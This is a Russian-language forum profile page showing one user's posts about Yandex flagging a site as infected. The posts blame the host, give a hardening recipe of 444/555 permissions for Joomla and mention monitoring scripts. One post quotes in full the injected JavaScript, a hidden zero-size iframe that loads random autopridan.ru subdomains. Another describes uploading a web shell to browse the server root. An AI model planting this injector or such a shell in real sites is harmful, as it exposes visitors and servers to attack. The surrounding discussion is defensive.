secline

secline
Рейтинг
18
Регистрация
25.10.2012
895553
Яндекс нашел вирус на сайте

Ну судя по всему sysmetvpn.php зловред который вписывает код в html5.js вот и все.

Самое что интересное почти всем подобный зловред и пишется на хостлайфе

var ifauZp = document.createElement('iframe');ifauZp.name = 'ifauZp';ifauZp.src = 'http://'+genstrdom(Math.floor(Math.random() * 20) + 5)+'.'+'autopridan.ru/';ifauZp.style.width = '0px';ifauZp.style.height = '0px';window.onload = function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('ifauZp=') == -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')[0].appendChild(ifauZp);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000);setTimeout(function() { document.cookie = 'ifauZp=yes; path=/; expires=' + expiresDate; }, 5000);}};function genstrdom(length) {var st = '';var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';for (i=1;i<length;i++) {var c = Math.floor(Math.random()*chars.length + 1);st += chars.charAt(c)}return st;}
Яндекс нашел вирус на сайте
Tird:
"Популярный скриптов" клиентов или софта хостера?
То есть они не признают, что проблема в них? Тогда напишите ему, что он идиот и пускай объяснит мне, как можно заразить сайт на голом HTML, сайт без использования PHP скриптов и БД.

Уверен они вам ответят что проблема у вас, либо пароль от FTP угнали, либо от панели управления, и скажут вам проверить свой компьютер на вирусы и сменить все пароли))😂

Не признают они свою проблему😒

Яндекс нашел вирус на сайте

За 27 число в логах несколько раз появлялось /sysmetvpn.php с IP адреса 89.248.238.136.

Потом сразу же он идет сюда GET /templates/themes/jquery.js ну а далее вписывается код)

До этого уже недели 3 как повсюду права стоят 444 на файлы, 27 августа для теста убрал с файлов темы права 444, и вернул 644, код сразу же вписался.

Яндекс нашел вирус на сайте

Приятно осознавать что проблема не только у меня и что виноват хостер а не файлы движка и их плагины.

Первые вредоносные файлы вписались в JS 7 и 10 августа, после 10 августа проставил на большинство папок 555 права а на файлы 444. Зловредов больше нет.

Скрипт для поиска шеллов и другого вредоносного по

в .htaccess

php_value max_execution_time N

Где N время выполнения в секундах. А по поводу SSH то это вам надо обратится к хостеру, а так подключиться можно через putty.exe, имея данные для подключения.

Если нечего не путаю))

Яндекс нашел вирус на сайте

Залил к себе на сайт шелл, вышел в корневую директорию, разве не должно быть такого запрета? На других хостингах помню выйти из своей директории не возможно было.

90440002 drwxr-xr-x 14 root root 4096 Aug 15 01:15 .
90440002 drwxr-xr-x 14 root root 4096 Aug 15 01:15 ..
90440104 dr-xr-xr-x 2 root root 4096 Aug 15 01:04 bin
90440134 drwxr-xr-x 4 root root 4096 Aug 16 10:09 dev
52954295 drwxr-xr-x 27 root root 4096 Aug 20 03:38 etc
53217472 drwxr-xr-x 3 root root 4096 Aug 16 00:00 home
73924609 dr-xr-xr-x. 10 root root 4096 Apr 16 19:37 lib
96206849 dr-xr-xr-x. 9 root root 12288 Aug 15 05:22 lib64
90440044 drwxr-xr-x 5 root root 4096 Aug 16 10:48 opt
1 dr-xr-xr-x 519 root root 0 Aug 15 02:46 proc
90446410 dr-xr-xr-x 2 root root 4096 Aug 16 03:49 sbin
90440003 drwxr-xr-x 12 root root 4096 Aug 15 01:04 usr
90440037 drwxr-xr-x 9 root root 4096 Aug 16 15:07 var

А тут я могу заходить в любую из папок сервера получается, но и просматривать содержимое системных файлов.

Яндекс нашел вирус на сайте

Проверил сайт айболитом, все ок, пришлось через SSH проверять около 2-3 часов сканирование шло.

А так на сайте стоит порядка 3 скриптов, которые ежедневно через CRON проверяют все директории на наличие новых или изменившихся файлов и шлют отчеты на мыло.

Яндекс нашел вирус на сайте

Уже писал выше, проблему решил установкой прав доступа 444 и 555..

Вот для Joomla 2.5 что я сделал

Всем корневым файлам Joomla (configuration.php, robots.txt, .htaccess и так далее) назначьте минимальные права для всех групп – 444, для остальных можно установить параметр 644.

Для нижеперечисленных папок необходимо установить права доступа 555 :
administrator/backups/
administrator/cache/
administrator/language/
administrator/language/en-GB/
administrator/language/ru-RU/ ...и если установлены и используются другие языковые пакеты, то же самое и с ними
administrator/modules/
administrator/templates/
cache/
components/
images/
images/banners/
images/stories/
language/
language/en-GB/
language/ru-RU/ ...с другими языками то же самое
media/
modules/
plugins/
plugins/content/
plugins/editors/
plugins/editors-xtd/
plugins/search/
plugins/system/
plugins/user/
plugins/xmlrpc/
tmp/
templates/

После этого перестали вписываться вредоносные коды. А так тоже менял сколько раз пароли, все без толку. Похоже это у хостера проблема.

Яндекс нашел вирус на сайте

Порядка недели нету измененных файлов, все что сделал сменил опять все пароли, но думаю проблема не в этом, сменил на большинство папок CHMOD 555, а на файлы 444

Яндекс нашел вирус на сайте

Сказали что у них все хорошо, уже какой день общаемся. Во всем винят что популярные CMS взламываются, посоветовали права папок изменить и все.

1 234
Всего: 33